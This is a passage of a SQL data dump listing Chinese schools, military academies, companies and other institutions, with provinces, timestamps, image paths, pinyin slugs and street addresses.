17:40:39','/images/school/default.png','xinjiangshifangaodengzhuankexuexiao',0,NULL,NULL,0,NULL,NULL),(2296,'新疆兵团警官高等专科学校','新疆维吾尔自治区','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','xinjiangbingtuanjingguangaodengzhuankexuexiao',0,NULL,NULL,0,NULL,NULL),(2297,'乌鲁木齐职业大学','新疆维吾尔自治区','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','wulumuqizhiyedaxue',0,NULL,NULL,0,NULL,NULL),(2298,'新疆职业大学','新疆维吾尔自治区','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','xinjiangzhiyedaxue',0,NULL,NULL,0,NULL,NULL),(2299,'新疆体育职业技术学院','新疆维吾尔自治区','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','xinjiangtiyuzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(2300,'新疆应用职业技术学院','新疆维吾尔自治区','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','xinjiangyingyongzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(2301,'新疆铁道职业技术学院','新疆维吾尔自治区','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','xinjiangtiedaozhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(2302,'新疆农业职业技术学院','新疆维吾尔自治区','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','xinjiangnongyezhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(2303,'克拉玛依职业技术学院','新疆维吾尔自治区','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','kelamayizhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(2304,'新疆机电职业技术学院','新疆维吾尔自治区','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','xinjiangjidianzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(2305,'新疆轻工职业技术学院','新疆维吾尔自治区','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','xinjiangqinggongzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(2306,'新疆能源职业技术学院','新疆维吾尔自治区','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','xinjiangnengyuanzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(2307,'昌吉职业技术学院','新疆维吾尔自治区','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','changjizhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(2308,'伊犁职业技术学院','新疆维吾尔自治区','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','yilizhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(2309,'阿克苏职业技术学院','新疆维吾尔自治区','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','akesuzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(2310,'巴音郭楞职业技术学院','新疆维吾尔自治区','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','bayinguolengzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(2311,'新疆建设职业技术学院','新疆维吾尔自治区','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','xinjiangjianshezhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(2312,'新疆现代职业技术学院','新疆维吾尔自治区','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','xinjiangxiandaizhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(2313,'新疆天山职业技术学院','新疆维吾尔自治区','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','xinjiangtianshanzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(2314,'新疆交通职业技术学院','新疆维吾尔自治区','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','xinjiangjiaotongzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(2315,'新疆石河子职业技术学院','新疆维吾尔自治区','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','xinjiangshihezizhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(2317,'香港大学','香港','2014-11-25 16:48:47','2015-10-16 17:40:39','/images/transparent.png','xianggangdaxue',0,NULL,NULL,0,NULL,NULL),(2318,'香港中文大学','香港','2014-11-25 16:48:47','2015-10-16 17:40:39','/images/transparent.png','xianggangzhongwendaxue',0,NULL,NULL,0,NULL,NULL),(2319,'香港科技大学','香港','2014-11-25 16:48:47','2015-10-16 17:40:39','/images/transparent.png','xianggangkejidaxue',0,NULL,NULL,0,NULL,NULL),(2320,'香港理工大学','香港','2014-11-25 16:48:47','2015-10-16 17:40:39','/images/transparent.png','xianggangligongdaxue',0,NULL,NULL,0,NULL,NULL),(2321,'香港城市大学','香港','2014-11-25 16:48:47','2015-10-16 17:40:39','/images/transparent.png','xianggangchengshidaxue',0,NULL,NULL,0,NULL,NULL),(2322,'香港浸会大学','香港','2014-11-25 16:48:47','2015-10-16 17:40:39','/images/transparent.png','xianggangjinhuidaxue',0,NULL,NULL,0,NULL,NULL),(2323,'香港教育学院','香港','2014-11-25 16:48:47','2015-10-16 17:40:39','/images/transparent.png','xianggangjiaoyuxueyuan',0,NULL,NULL,0,NULL,NULL),(2324,'香港歌德学院','香港','2014-11-25 16:48:47','2015-10-16 17:40:39','/images/transparent.png','xiangganggedexueyuan',0,NULL,NULL,0,NULL,NULL),(2325,'香港岭南大学','香港','2014-11-25 16:48:47','2015-10-16 17:40:39','/images/transparent.png','xiangganglingnandaxue',0,NULL,NULL,0,NULL,NULL),(2326,'澳门大学','澳门','2014-11-25 16:48:47','2015-10-16 17:40:39','/images/transparent.png','aomendaxue',0,NULL,NULL,0,NULL,NULL),(2327,'澳门理工学院','澳门','2014-11-25 16:48:47','2015-10-16 17:40:39','/images/transparent.png','aomenligongxueyuan',0,NULL,NULL,0,NULL,NULL),(2328,'澳门科技大学','澳门','2014-11-25 16:48:47','2015-10-16 17:40:39','/images/transparent.png','aomenkejidaxue',0,NULL,NULL,0,NULL,NULL),(2329,'澳门保安部队高等学校','澳门','2014-11-25 16:48:47','2015-10-16 17:40:39','/images/transparent.png','aomenbaoanbuduigaodengxuexiao',0,NULL,NULL,0,NULL,NULL),(2330,'亚洲国际公开大学','澳门','2014-11-25 16:48:47','2015-10-16 17:40:39','/images/transparent.png','yazhouguojigongkaidaxue',0,NULL,NULL,0,NULL,NULL),(2331,'澳门旅游学院','澳门','2014-11-25 16:48:47','2015-10-16 17:40:39','/images/transparent.png','aomenlvyouxueyuan',0,NULL,NULL,0,NULL,NULL),(2332,'清华大学(新竹)','台湾','2014-11-25 16:48:47','2015-10-16 17:40:39','/images/transparent.png','qinghuadaxuexinzhu',0,NULL,NULL,0,NULL,NULL),(2333,'台湾大学','台湾','2014-11-25 16:48:47','2015-10-16 17:40:39','/images/transparent.png','taiwandaxue',0,NULL,NULL,0,NULL,NULL),(2335,'中央大学','台湾','2014-11-25 16:48:47','2015-10-16 17:40:39','/images/transparent.png','zhongyangdaxue',0,NULL,NULL,0,NULL,NULL),(2336,'成功大学','台湾','2014-11-25 16:48:47','2015-10-16 17:40:39','/images/transparent.png','chenggongdaxue',0,NULL,NULL,0,NULL,NULL),(2337,'中山大学','台湾','2014-11-25 16:48:47','2015-10-16 17:40:39','/images/transparent.png','zhongshandaxue',0,NULL,NULL,0,NULL,NULL),(2338,'中原大学','台湾','2014-11-25 16:48:47','2015-10-16 17:40:39','/images/transparent.png','zhongyuandaxue',0,NULL,NULL,0,NULL,NULL),(2339,'政治大学','台湾','2014-11-25 16:48:47','2015-10-16 17:40:39','/images/transparent.png','zhengzhidaxue',0,NULL,NULL,0,NULL,NULL),(2340,'元智大学','台湾','2014-11-25 16:48:47','2015-10-16 17:40:39','/images/transparent.png','yuanzhidaxue',0,NULL,NULL,0,NULL,NULL),(2341,'天主教辅仁大学','台湾','2014-11-25 16:48:47','2015-10-16 17:40:39','/images/transparent.png','tianzhujiaofurendaxue',0,NULL,NULL,0,NULL,NULL),(2342,'台湾科技大学','台湾','2014-11-25 16:48:47','2015-10-16 17:40:39','/images/transparent.png','taiwankejidaxue',0,NULL,NULL,0,NULL,NULL),(2343,'台湾师范大学','台湾','2014-11-25 16:48:47','2015-10-16 17:40:39','/images/transparent.png','taiwanshifandaxue',0,NULL,NULL,0,NULL,NULL),(2344,'台湾艺术大学','台湾','2014-11-25 16:48:47','2015-10-16 17:40:39','/images/transparent.png','taiwanyishudaxue',0,NULL,NULL,0,NULL,NULL),(2356,'艾迪欧商学院',NULL,'2015-11-06 11:27:54','2015-11-06 11:27:54',NULL,'aidioushangxueyuan',0,NULL,NULL,0,NULL,NULL),(2372,'中国人民解放军理工大学','江苏省','2016-01-20 17:09:29','2016-01-20 17:13:37','/images/school/2372.png','zhongguorenminjiefangjunligongdaxue',0,NULL,NULL,0,NULL,NULL),(2373,'中国科学院软件研究所',NULL,'2016-01-26 14:26:15','2016-01-26 14:26:15',NULL,'zhongguokexueyuanruanjianyanjiusuo',0,NULL,NULL,0,NULL,NULL),(2406,'哈尔滨工业大学(威海)',NULL,'2016-03-26 19:25:42','2016-08-01 20:07:05',NULL,'haerbingongyedaxueweihai',0,NULL,NULL,0,NULL,NULL),(2412,'海军军医大学(第二军医大学)',NULL,'2016-04-13 16:32:56','2017-09-04 16:32:51',NULL,'zhongguorenminjiefangjundierjunyidaxue',0,NULL,NULL,0,NULL,NULL),(2418,'河北地质大学',NULL,'2016-06-27 17:10:57','2016-06-27 17:10:57',NULL,'hebeidizhidaxue',0,NULL,NULL,0,NULL,NULL),(2428,'悉尼科技大学','海外','2016-08-31 16:40:23','2017-10-13 22:14:08',NULL,'xinikejidaxue',0,'其他','University of Technology Sydney, Broadway, NSW 2007',0,NULL,NULL),(2432,'蓝翔职业技术学院','山东','2016-09-02 12:49:39','2017-10-13 22:14:08',NULL,'lanxiangzhiyejishuxueyuan',0,'济南',' 山东济南天桥区蓝翔中路11号',0,NULL,NULL),(2434,'中国自动化学会','北京','2016-09-03 18:23:17','2017-10-13 22:14:08',NULL,'zhongguozidonghuaxuehui',0,'海淀','北京市中关村东路95号',0,NULL,NULL),(2435,'广东东软学院','广东','2016-09-09 10:51:56','2017-10-13 22:14:08',NULL,'guangdongdongruanxueyuan',0,'佛山','广东省佛山市狮山大学城',1,NULL,'2018-01-01 10:00:00'),(2437,'中科院生态研究中心','北京','2016-09-09 17:39:31','2017-10-13 22:14:08',NULL,'zhongkeyuanshengtaiyanjiuzhongxin',0,'海淀','北京市海淀区双清路',0,NULL,NULL),(2438,'湘潭大学兴湘学院','湖南','2016-09-14 08:23:20','2017-10-13 22:14:08',NULL,'xiangtandaxuexingxiangxueyuan',0,'湘潭','湖南省湘潭市雨湖区羊牯塘街道湘潭大学',1,NULL,'2018-01-01 10:00:00'),(2443,'先一科技','湖南','2016-09-26 15:33:25','2017-10-13 22:14:08',NULL,'xianyikeji',0,'长沙','长沙市韶山中路752号',0,NULL,NULL),(2447,'联想集团有限公司','湖南','2016-10-08 16:54:27','2017-10-13 22:14:08',NULL,'lianxiangjituanyouxiangongsi',0,'长沙','长沙市天心区侯家塘南友阿光大大厦12楼',0,NULL,NULL),(2449,'东南大学成贤学院','江苏','2016-10-11 16:53:20','2017-10-13 22:14:08',NULL,'dongnandaxuechengxianxueyuan',0,'南京','浦口区泰山街道东大路6号',0,NULL,NULL),(2458,'海军工程大学','湖北','2016-10-24 19:43:04','2017-10-13 22:14:08',NULL,'haijungongchengdaxue',0,'武汉','硚口区解放大道717号',0,NULL,NULL),(2475,'山东中创软件工程股份有限公司','山东','2016-11-01 08:29:34','2018-07-16 16:56:33',NULL,'shandongzhongchuangruanjiangongchenggufenyouxiangongsi',0,'济南','济南市千佛山东路41-1号',1,NULL,'2018-07-16 16:56:33'),(2481,'中证技术股份有限公司','北京','2016-11-08 11:51:17','2017-10-13 22:14:08',NULL,'zhongzhengjishugufenyouxiangongsi',0,'东城','北京海淀区',0,NULL,NULL),(2484,'德雅村职业技术学院','湖南','2016-11-14 17:53:13','2017-10-13 22:14:08',NULL,'deyacunzhiyejishuxueyuan',0,'长沙','德雅村731号',0,NULL,NULL),(2491,'无锡RBS','江苏','2017-01-06 15:29:11','2017-10-13 22:14:08',NULL,'wuxiRBS',0,'无锡','无锡市锡山科创园',0,NULL,NULL),(2492,'华为技术有限公司','广东','2017-01-16 09:30:32','2017-10-13 22:14:08',NULL,'huaweijishuyouxiangongsi',0,'深圳','龙岗区坂田华为基地',0,NULL,NULL),(2494,'工信部软促中心','北京','2017-02-13 17:14:04','2017-10-13 22:14:08',NULL,'gongxinburuancuzhongxin',0,'海淀','万寿路27号院',0,NULL,NULL),(2498,'湖南商学院北津学院','湖南','2017-02-15 20:06:31','2017-10-13 22:14:08',NULL,'hunanshangxueyuanbeijinxueyuan',0,'长沙','湖南省望城县雷锋大道',0,NULL,NULL),(2503,'解放军报社','北京','2017-02-20 10:49:52','2017-10-13 22:14:08',NULL,'jiefangjunbaoshe',0,'西城','北京市西城区阜外大街34号',0,NULL,NULL),(2507,'海军航空大学','山东','2017-02-22 15:51:03','2017-10-13 22:14:08',NULL,'haijunhangkonggongchengxueyuan',0,'烟台','二马路',0,NULL,NULL),(2509,'无锡市同步电子科技有限公司','江苏','2017-02-25 11:15:50','2017-10-13 22:14:08',NULL,'wuxishitongbudianzikejiyouxiangongsi',0,'无锡','无锡市滨湖区湖滨路688号华东大厦20楼',0,NULL,NULL),(2512,'湖南领先网络科技有限公司','湖南','2017-02-28 18:30:29','2017-10-13 22:14:08',NULL,'hunanlingxianwangluokejiyouxiangongsi',0,'长沙','岳麓区金星中路438号',0,NULL,NULL),(2515,'广东生态职业学院','广东','2017-03-07 22:35:00','2017-10-13 22:14:08',NULL,'guangdongshengtaizhiyexueyuan',0,'广州','广州天河广汕一路297号',0,NULL,NULL),(2516,'太原大学','山西','2017-03-07 22:41:15','2017-10-13 22:14:08',NULL,'taiyuandaxue',0,'太原','大昌南路18号',0,NULL,NULL),(2518,'北京赛普信科技术有限公司','北京','2017-06-02 11:37:10','2017-10-13 22:14:08',NULL,'beijingsaipuxinkejishuyouxiangongsi',0,'海淀','赛迪大厦',0,NULL,NULL),(2519,'众云教育','山东','2017-07-02 12:40:22','2017-10-13 22:14:08',NULL,'zhongyunjiaoyu',0,'济南','高新区',0,NULL,NULL),(2520,'广州传知信息科技有限公司','广东','2017-07-20 07:35:43','2017-10-13 22:14:08',NULL,'guangzhouchuanzhixinxikejiyouxiangongsi',0,'广州','广州市天河北路898号',0,NULL,NULL),(2522,'陆军军医大学(第三军医大学)','重庆','2017-08-28 10:20:59','2017-10-13 22:14:08',NULL,'disanjunyidaxue',0,'沙坪坝','重庆市沙坪坝区高滩岩正街30号',0,NULL,NULL),(2523,'边海防学院','陕西','2017-08-28 15:25:46','2017-10-13 22:14:08',NULL,'bianhaifangxueyuan',0,'西安','长安区甲字9号',0,NULL,NULL),(2524,'空军预警学院','湖北','2017-08-28 15:25:57','2017-10-13 22:14:08',NULL,'kongjunyujingxueyuan',0,'武汉','湖北省武汉市江岸区黄浦大街288号',0,NULL,NULL),(2525,'陆军工程大学','江苏','2017-08-28 15:30:25','2017-10-13 22:14:08',NULL,'lujungongchengdaxue',0,'南京','江苏省南京市白下区',0,NULL,NULL),(2526,'空军工程大学','陕西','2017-08-28 15:33:25','2017-10-13 22:14:08',NULL,'kongjungongchengdaxue',0,'西安','陕西省西安市长乐东路甲字1号',0,NULL,NULL),(2527,'航天工程大学','北京','2017-08-28 15:40:08','2017-10-13 22:14:08',NULL,'hangtiangongchengdaxue',0,'怀柔','北京怀柔八一路一号',0,NULL,NULL),(2528,'空军航空大学','吉林','2017-08-28 16:02:00','2017-10-13 22:14:08',NULL,'kongjunhangkongdaxue',0,'长春','吉林长春',0,NULL,NULL),(2529,'陆军装甲兵学院','北京','2017-08-28 22:25:15','2017-10-13 22:14:08',NULL,'lujunzhuangjiabingxueyuan',0,'丰台','北京丰台区杜家坎19号院',0,NULL,NULL),(2530,'火箭军工程大学','陕西','2017-08-29 10:52:11','2017-10-13 22:14:08',NULL,'huojianjungongchengdaxue',0,'西安','陕西省灞桥区同心路2号',0,NULL,NULL),(2531,'空军军医大学(第四军医大学)','陕西','2017-08-29 11:11:07','2017-10-13 22:14:08',NULL,'kongjunjunyidaxue',0,'西安','长乐西路',0,NULL,NULL),(2532,'陆军勤务学院','重庆','2017-08-29 11:19:12','2017-10-13 22:14:08',NULL,'lujunqinwuxueyuan',0,'沙坪坝','重庆市沙坪坝区大学城',0,NULL,NULL),(2533,'陆军边海防学院','陕西','2017-08-29 11:22:46','2017-10-13 22:14:08',NULL,'lujunbianhaifangxueyuan',0,'西安','长安区子午街道曹村甲字9号',0,NULL,NULL),(2534,'海军大连舰艇学院','辽宁','2017-08-29 11:52:22','2017-10-13 22:14:08',NULL,'dalianjiantingxueyuan',0,'大连','辽宁省大连市中山区解放路667号',0,NULL,NULL),(2535,'空军勤务学院','江苏','2017-08-29 12:39:16','2017-10-13 22:14:08',NULL,'kongjunqinwuxueyuan',0,'徐州','鼓楼区西阁街85号',0,NULL,NULL),(2536,'陆军防化学院','北京','2017-09-02 12:03:44','2017-10-13 22:14:08',NULL,'lujunfanghuaxueyuan',0,'昌平','北京市昌平区阳坊镇中心北街1号院',0,NULL,NULL),(2537,'陆军特种作战学院','广西','2017-09-03 18:11:46','2017-10-13 22:14:08',NULL,'lujuntezhongzuozhanxueyuan',0,'桂林','桂林市崇信路33号',0,NULL,NULL),(2538,'国防大学','北京','2017-09-04 16:26:52','2017-10-13 22:14:08',NULL,'guofangdaxue',0,'海淀','海淀区红山口甲3号 ',0,NULL,NULL),(2539,'陆军步兵学院','江西','2017-09-04 16:29:13','2017-10-13 22:14:08',NULL,'lujunbubingxueyuan',0,'南昌','南昌',0,NULL,NULL),(2540,'陆军炮兵防空兵学院','安徽','2017-09-04 16:30:47','2017-10-13 22:14:08',NULL,'lujunpaobingfangkongbingxueyuan',0,'合肥','蜀山区黄山路451号',0,NULL,NULL),(2542,'陆军航空兵学院','北京','2017-09-04 16:34:24','2017-10-13 22:14:08',NULL,'lujunhangkongbingxueyuan',0,'东城','北京',0,NULL,NULL),(2543,'海军潜艇学院','山东','2017-09-04 16:35:25','2017-10-13 22:14:08',NULL,'haijunqiantingxueyuan',0,'青岛','青岛',0,NULL,NULL),(2544,'海军指挥学院','江苏','2017-09-04 16:39:42','2017-10-13 22:14:08',NULL,'haijunzhihuixueyuan',0,'南京','南京',0,NULL,NULL),(2545,'陆军军事交通学院','天津','2017-09-04 16:40:59','2017-10-13 22:14:08',NULL,'lujunjunshijiaotongxueyuan',0,'天津','天津',0,NULL,NULL),(2546,'陆军指挥学院','江苏','2017-09-04 16:41:37','2017-10-13 22:14:08',NULL,'lujunzhihuixueyuan',0,'南京','南京',0,NULL,NULL),(2547,'海军勤务学院','天津','2017-09-04 16:43:41','2017-10-13 22:14:08',NULL,'haijunqinwuxueyuan',0,'天津','塘沽区',0,NULL,NULL),(2548,'海军士官学校','安徽','2017-09-04 16:45:01','2017-10-13 22:14:08',NULL,'haijunshiguanxuexiao',0,'蚌埠','安徽',0,NULL,NULL),(2549,'空军指挥学院','北京','2017-09-04 16:46:15','2017-10-13 22:14:08',NULL,'kongjunzhihuixueyuan',0,'东城','北京',0,NULL,NULL),(2550,'空军哈尔滨飞行学院','黑龙江','2017-09-04 16:47:47','2017-10-13 22:14:08',NULL,'kongjunhaerbinfeixingxueyuan',0,'哈尔滨','哈尔滨',0,NULL,NULL),(2551,'空军石家庄飞行学院','河北','2017-09-04 16:49:11','2017-10-13 22:14:08',NULL,'kongjunshijiazhuangfeixingxueyuan',0,'石家庄','石家庄',0,NULL,NULL),(2552,'空军西安飞行学院','陕西','2017-09-04 16:49:34','2017-10-13 22:14:08',NULL,'kongjunxianfeixingxueyuan',0,'西安','西安',0,NULL,NULL),(2553,'空军通信士官学校','辽宁','2017-09-04 16:51:08','2017-10-13 22:14:08',NULL,'kongjuntongxinshiguanxuexiao',0,'大连','大连',0,NULL,NULL),(2554,'火箭军指挥学院','湖北','2017-09-04 16:51:40','2017-10-13 22:14:08',NULL,'huojianjunzhihuixueyuan',0,'武汉','武汉',0,NULL,NULL),(2555,'火箭军士官学校','天津','2017-09-04 16:54:19','2017-10-13 22:14:08',NULL,'huojianjunshiguanxuexiao',0,'天津','天津',0,NULL,NULL),(2556,'战略支援部队航天工程大学','北京','2017-09-04 16:55:18','2017-10-13 22:14:08',NULL,'zhanlvezhiyuanbuduihangtiangongchengdaxue',0,'东城','北京',0,NULL,NULL),(2557,'战略支援部队信息工程大学','河南','2017-09-04 16:55:53','2017-10-13 22:14:08',NULL,'zhanlvezhiyuanbuduixinxigongchengdaxue',0,'郑州','郑州',0,NULL,NULL),(2558,'武警部队指挥学院','天津','2017-09-04 16:56:28','2017-10-13 22:14:08',NULL,'wujingbuduizhihuixueyuan',0,'天津','天津',0,NULL,NULL),(2559,'武警部队工程大学','陕西','2017-09-04 16:57:01','2017-10-13 22:14:08',NULL,'wujingbuduigongchengdaxue',0,'西安','西安',0,NULL,NULL),(2560,'武警部队警官学院','四川','2017-09-04 16:57:55','2017-10-13 22:14:08',NULL,'wujingbuduijingguanxueyuan',0,'成都','成都',0,NULL,NULL),(2561,'武警部队特种兵警察学院','北京','2017-09-04 16:58:35','2017-10-13 22:14:08',NULL,'wujingbuduitezhongbingjingchaxueyuan',0,'东城','北京',0,NULL,NULL),(2562,'武警部队后勤学院','天津','2017-09-04 16:59:18','2017-10-13 22:14:08',NULL,'wujingbuduihouqinxueyuan',0,'河东','河东区成林道',0,NULL,NULL),(2563,'武警部队士官学校','河北','2017-09-04 17:00:20','2017-10-13 22:14:08',NULL,'wujingbuduishiguanxuexiao',0,'石家庄','石家庄',0,NULL,NULL),(2564,'中国矿业大学(北京)','北京','2017-09-11 17:24:36','2017-10-13 22:14:08',NULL,'zhongguokuangyedaxuebeijing',0,'海淀','学院路丁11号',0,NULL,NULL),(2565,'首都师范大学科德学院','北京','2017-09-11 17:25:23','2017-10-13 22:14:08',NULL,'shoudushifandaxuekedexueyuan',0,'大兴','榆垡镇榆祥路10号',0,NULL,NULL),(2566,'北京工商大学嘉华学院','北京','2017-09-11 17:25:53','2017-10-13 22:14:08',NULL,'beijinggongshangdaxuejiahuaxueyuan',0,'通州','宋庄南路甲1号',0,NULL,NULL),(2567,'北京邮电大学世纪学院','北京','2017-09-11 17:26:30','2017-10-13 22:14:08',NULL,'beijingyoudiandaxueshijixueyuan',0,'海淀','西土城路10号',0,NULL,NULL),(2568,'北京工业大学耿丹学院','北京','2017-09-11 17:27:05','2017-10-13 22:14:08',NULL,'beijinggongyedaxuegengdanxueyuan',0,'顺义','牛栏山镇牛富路牛山段3号',0,NULL,NULL),(2569,'北京第二外国语学院中瑞酒店管理学院','北京','2017-09-11 17:27:34','2017-10-13 22:14:08',NULL,'beijingdierwaiguoyuxueyuanzhongruijiudianguanlixueyuan',0,'大兴','庞各庄镇田园路11号',0,NULL,NULL),(2570,'中国社会科学院大学','北京','2017-09-11 17:28:42','2017-10-13 22:14:08',NULL,'zhongguoshehuikexueyuandaxue',0,'房山','长于大街11号 ',0,NULL,NULL),(2571,'北京艺术传媒职业学院','北京','2017-09-11 17:29:07','2017-10-13 22:14:08',NULL,'beijingyishuchuanmeizhiyexueyuan',0,'海淀','聂各庄东路10号',0,NULL,NULL),(2572,'北京网络职业学院','北京','2017-09-11 17:29:43','2017-10-13 22:14:08',NULL,'beijingwangluozhiyexueyuan',0,'房山','大窦路12号',0,NULL,NULL),(2573,'天津中德应用技术大学','天津','2017-09-11 17:30:52','2017-10-13 22:14:08',NULL,'tianjinzhongdeyingyongjishudaxue',0,'天津','雅深路2号',0,NULL,NULL),(2574,'天津外国语大学滨海外事学院','天津','2017-09-11 17:32:37','2017-10-13 22:14:08',NULL,'tianjinwaiguoyudaxuebinhaiwaishixueyuan',0,'天津','大港学府路60号',0,NULL,NULL),(2575,'天津体育学院运动与文化艺术学院','天津','2017-09-11 17:33:46','2017-10-13 22:14:08',NULL,'tianjintiyuxueyuanyundongyuwenhuayishuxueyuan',0,'蓟县','盘山大道68号',0,NULL,NULL),(2576,'天津商业大学宝德学院','天津','2017-09-12 08:43:51','2017-10-13 22:14:08',NULL,'tianjinshangyedaxuebaodexueyuan',0,'西青','张家窝镇津静路28号',0,NULL,NULL),(2577,'天津医科大学临床医学院','天津','2017-09-12 08:44:39','2017-10-13 22:14:08',NULL,'tianjinyikedaxuelinchuangyixueyuan',0,'大港','学苑路167号',0,NULL,NULL),(2578,'南开大学滨海学院','天津','2017-09-12 08:46:41','2017-10-13 22:14:08',NULL,'nankaidaxuebinhaixueyuan',0,'大港','学府路 634 号',0,NULL,NULL),(2579,'天津师范大学津沽学院','天津','2017-09-12 08:47:15','2017-10-13 22:14:08',NULL,'tianjinshifandaxuejinguxueyuan',0,'西青','宾水西道393号',0,NULL,NULL),(2580,'天津理工大学中环信息学院','天津','2017-09-12 08:47:55','2017-10-13 22:14:08',NULL,'tianjinligongdaxuezhonghuanxinxixueyuan',0,'西青','杨柳青柳口路99号',0,NULL,NULL),(2581,'北京科技大学天津学院','天津','2017-09-12 08:53:39','2017-10-13 22:14:08',NULL,'beijingkejidaxuetianjinxueyuan',0,'宝坻','京津新城珠江北环东路1号',0,NULL,NULL),(2582,'天津大学仁爱学院','天津','2017-09-12 08:54:13','2017-10-13 22:14:08',NULL,'tianjindaxuerenaixueyuan',0,'静海','团泊新城博学苑',0,NULL,NULL),(2583,'天津财经大学珠江学院','天津','2017-09-12 08:56:21','2017-10-13 22:14:08',NULL,'tianjincaijingdaxuezhujiangxueyuan',0,'宝坻','京津新城珠江北环东路2号',0,NULL,NULL),(2584,'天津体育职业学院','天津','2017-09-12 09:00:47','2017-10-13 22:14:08',NULL,'tianjintiyuzhiyexueyuan',0,'静海','天津健康产业园体育基地',0,NULL,NULL),(2585,'天津滨海汽车工程职业学院','天津','2017-09-12 09:01:51','2017-10-13 22:14:08',NULL,'tianjinbinhaiqichegongchengzhiyexueyuan',0,'津南','葛沽镇创新二路36号',0,NULL,NULL),(2586,'华北理工大学','河北','2017-09-12 09:02:44','2017-10-13 22:14:08',NULL,'huabeiligongdaxue',0,'唐山','新华西道46号',0,NULL,NULL),(2587,'河北水利电力学院','河北','2017-09-12 09:03:50','2017-10-13 22:14:08',NULL,'hebeishuilidianlixueyuan',0,'沧州','运河区重庆路1号',0,NULL,NULL),(2588,'河北大学工商学院','河北','2017-09-12 09:04:28','2017-10-13 22:14:08',NULL,'hebeidaxuegongshangxueyuan',0,'保定','莲池区(原北市区)七一东路2666号河北大学新校区',0,NULL,NULL),(2589,'华北理工大学轻工学院','河北','2017-09-12 09:05:03','2017-10-13 22:14:08',NULL,'huabeiligongdaxueqinggongxueyuan',0,'唐山','高新区大学西道11号',0,NULL,NULL),(2590,'河北科技大学理工学院','河北','2017-09-12 09:05:28','2017-10-13 22:14:08',NULL,'hebeikejidaxueligongxueyuan',0,'石家庄','裕华东路70号',0,NULL,NULL),(2591,'河北师范大学汇华学院','河北','2017-09-12 09:05:57','2017-10-13 22:14:08',NULL,'hebeishifandaxuehuihuaxueyuan',0,'石家庄','红旗大街469号',0,NULL,NULL),(2592,'河北经贸大学经济管理学院','河北','2017-09-12 09:08:02','2017-10-13 22:14:08',NULL,'hebeijingmaodaxuejingjiguanlixueyuan',0,'石家庄','红旗大街428号',0,NULL,NULL),(2593,'河北医科大学临床学院','河北','2017-09-12 09:08:32','2017-10-13 22:14:08',NULL,'hebeiyikedaxuelinchuangxueyuan',0,'石家庄','建华南大街309号',0,NULL,NULL),(2594,'华北电力大学科技学院','河北','2017-09-12 09:09:05','2017-10-13 22:14:08',NULL,'huabeidianlidaxuekejixueyuan',0,'保定','瑞祥大街282号',0,NULL,NULL),(2595,'河北工程大学科信学院','河北','2017-09-12 09:09:41','2017-10-13 22:14:08',NULL,'hebeigongchengdaxuekexinxueyuan',0,'邯郸','光明南大街199号',0,NULL,NULL),(2596,'河北工业大学城市学院','河北','2017-09-12 09:11:19','2017-10-13 22:14:08',NULL,'hebeigongyedaxuechengshixueyuan',0,'廊坊','新华路144号',0,NULL,NULL),(2597,'燕山大学里仁学院','河北','2017-09-12 09:11:56','2017-10-13 22:14:08',NULL,'yanshandaxuelirenxueyuan',0,'秦皇岛','河北大街438号',0,NULL,NULL),(2598,'石家庄铁道大学四方学院','河北','2017-09-12 09:17:45','2017-10-13 22:14:08',NULL,'shijiazhuangtiedaodaxuesifangxueyuan',0,'石家庄','装院路甲一号',0,NULL,NULL),(2599,'河北地质大学华信学院','河北','2017-09-12 09:19:14','2017-10-13 22:14:08',NULL,'hebeidizhidaxuehuaxinxueyuan',0,'石家庄','汇丰路18号',0,NULL,NULL),(2600,'河北农业大学现代科技学院','河北','2017-09-12 09:19:54','2017-10-13 22:14:08',NULL,'hebeinongyedaxuexiandaikejixueyuan',0,'保定','乐凯南大街2596号',0,NULL,NULL),(2601,'华北理工大学冀唐学院','河北','2017-09-12 09:21:12','2017-10-13 22:14:08',NULL,'huabeiligongdaxuejitangxueyuan',0,'唐山','丰南区正泰街29号',0,NULL,NULL),(2602,'中国地质大学长城学院','河北','2017-09-12 09:21:50','2017-10-13 22:14:08',NULL,'zhongguodizhidaxuechangchengxueyuan',0,'保定','南二环1689号',0,NULL,NULL),(2603,'北京中医药大学东方学院','河北','2017-09-12 09:22:36','2017-10-13 